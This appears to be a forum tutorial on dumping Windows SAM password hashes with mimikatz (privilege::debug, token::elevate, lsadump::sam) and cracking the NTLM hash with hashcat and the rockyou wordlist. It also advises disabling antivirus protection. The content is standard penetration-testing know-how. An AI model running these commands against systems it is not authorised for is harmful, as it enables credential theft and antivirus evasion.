Teacher
Professional
⛏ Requirements
➤ Linux Machine (Host Machine)
➤ Windows Machine + Escalated Permissions
➤ CMD Access
➤ Password List

Steps

Get mimikatz and hashcat
First of all we need mimikatz. If you are using Kali Linux you can find it here:
Code:
/usr/share/windows-resources/mimikatz
Open the folder and zip it (the zip is written to your current directory):
Code:
xdg-open /usr/share/windows-resources/mimikatz
sudo zip `pwd`/mimikatz.zip -r -1 /usr/share/windows-resources/mimikatz
After we created our zip, upload it somewhere, download it on Windows and drag it to the desktop. Keep in mind that Windows Defender and practically every other AV product flag mimikatz.exe on sight, so real-time protection has to be off (or excluded for that folder) on the Windows box or the file will be quarantined as soon as it lands.
We also need hashcat for the cracking part:
Code:
sudo apt install hashcat -y

Check Architecture
Open cmd and type:
Code:
wmic os get osarchitecture
If it says 32-bit, go into the Win32 folder; if 64-bit, go into the x64 folder. (wmic is deprecated on current Windows 11 builds; `echo %PROCESSOR_ARCHITECTURE%` gives the same answer everywhere: x86 means 32-bit, AMD64 means 64-bit.)

Run Mimikatz
Run mimikatz.exe as Administrator.
To test the debug privilege we type:
Code:
privilege::debug
The success response should be:
Privilege '20' OK
If you get an error here, the shell you started mimikatz from is not elevated; a plain member of the Administrators group without an elevated (UAC-approved) token does not hold SeDebugPrivilege.

Impersonate Token & Dump SAM
lsadump::sam reads the SAM and SYSTEM hives through the registry, which only the SYSTEM account may do, so an administrator token is not enough. To impersonate a SYSTEM token we use the following command:
Code:
token::elevate
It will print a lot of text: the list of tokens it found and the one it impersonated. The last lines should show the thread token as NT AUTHORITY\SYSTEM.
Now let's dump the SAM:
Code:
lsadump::sam
The output looks like this:

Note And Crack The Hash
Scroll down. After a bit of scrolling you will see, per account, the "RID", "User" and "Hash NTLM". An account whose NT hash is 31d6cfe0d16ae931b73c59d7e0c089c0 has a blank password (Guest and disabled accounts usually show this); there is nothing to crack there.
I scrolled down until I saw my username and then copied the hash into a Linux text file.
Code:
echo "0cb6948...07973b89537" > password.hash
Now it's time to crack the hash with hashcat.
Code:
hashcat -m 1000 password.hash /usr/share/wordlists/rockyou.txt
-m = mode
1000 = NTLM
If you want different modes you can either use the hashcat help or take a look at their wiki:
Code:
hashcat --help
hashcat.net (hashcat wiki)
Finally, when hashcat stops, you can view your cracked password either in hashcat's potfile (every cracked hash is appended there automatically, so a second run of the same command will report the hash as already cracked) or by repeating the command with the --show parameter:
Code:
hashcat -m 1000 password.hash /usr/share/wordlists/rockyou.txt --show
